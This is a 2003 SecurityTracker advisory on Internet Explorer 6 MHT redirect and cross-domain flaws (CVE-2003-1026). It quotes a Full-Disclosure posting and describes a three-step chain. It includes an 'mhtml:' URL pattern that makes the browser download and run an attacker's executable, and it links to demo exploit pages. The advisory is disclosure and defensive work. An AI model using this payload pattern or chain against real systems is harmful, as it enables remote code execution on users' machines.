Microsoft Internet Explorer MHT Redirect Flaws Let Remote Users Execute Arbitrary Code - SecurityTracker

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Category: Application (Web Browser) > Microsoft Internet Explorer

Vendors: Microsoft

Microsoft Internet Explorer MHT Redirect Flaws Let Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1008292

SecurityTracker URL: http://securitytracker.com/id/1008292

CVE Reference: CVE-2003-1026 (Links to External Site)

Updated: Jan 9 2004

Original Entry Date: Nov 25 2003

Impact: Execution of arbitrary code via network, User access via network

Exploit Included: Yes

Version(s): 6 SP1, possibly earlier versions

Description: Several vulnerabilities were reported in Microsoft Internet Explorer (IE) involving IE's MHT redirect functions and subframe cross-domain security restrictions. A remote user can create HTML that, when loaded by the target user, will cause arbitrary code to be executed by the target user's browser.

Liu Die Yu reported a method that exploits multiple, previously unreported vulnerabilities in IE to download an execute an arbitrary executable on the target user's system.

A remote user can first create HTML in the Internet security zone that contains an IFRAME that will use MhtRedirParsesLocalFile to parse a local file. The flaw reportedly resides in the code that retrieves files embedded within an MHT file. Using a URL of the format "mhtml:[Mhtml_File_Url]![Original_Resource_Url]", in a manner similar to an HTTP redirect, IE will reportedly attempt to download the "Original_Resource_Url]" if the file cannot be retrieved from the file ("Mhtml_File_Url").

A demonstration of this method is available at:

http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile/MhtRedirParsesLocalFile-Demo/index.html

Then, the remote user can exploit a cross-site scripting flaw to bypass IE's cross-domain security restrictions. A subframe of a malicious HTML document can reportedly load a javascript-protocol URL in a manner that the javascript-protocol URL will be executed in the security context of the original malicious HTML document [CVE: CVE-2003-1026]. This is reported to be a variation of a flaw that was ostensibly corrected in a previous Microsoft security fix.

A demonstration of this method is available at:

http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPage.htm

Finally, the remote user can exploit the MhtRedirLaunchInetExe function to download an arbitrary executable from the Internet and execute it in the My Computer zone. This is similar to the MhtRedirParsesLocalFile exploit step. HTML in the My Computer security zone can then point the CODEBASE property of an OBJECT tag with an unused CLSID to the following type of URL:

mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]

IE will then download the file ("Attaker_PayloadEXE_Url") and execute it in the My Computer security zone with the privileges of the target user, the report said.

A demonstration of this final step is available at:

http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Demo.zip

A demonstration of the entire exploit process is available at:

http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html

The original advisory is available at:

http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc

Impact: A remote user can create HTML that, when loaded by the target user, will execute arbitrary code with the privileges of the target user.

Solution: No solution was available at the time of this entry.

The author of the report recommends that you disable Active Scripting in the Internet zone as a workaround.

Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)

Cause: Access control error, State error

Underlying OS: Windows (Any)

Message History: None.

Source Message Contents

Subject: [Full-Disclosure] IE Key


IE Key
_________________________________
(.)1stCleanRc (EXPLAIN: "Clean" means there is no disclosed vulnerability)
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc
(.)MhtRedirParsesLocalFile
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile
(.)MhtRedirLaunchInetExe
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe
(.)BackToFramedJpu (it may also works on MOZILLA?)
http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu
(.)HijackClickV2
http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2
(.)threadid10008
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008
(.)threadid10008-Note
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Note.htm
(.)LocalZoneInCache
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache
(.)execdror6
http://www.safecenter.net/UMBRELLAWEBV4/execdror6
_________________________________
http://clik.to/donatepc



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
This web site uses cookies for web analytics. Learn More
Copyright 2020, SecurityGlobal.net LLC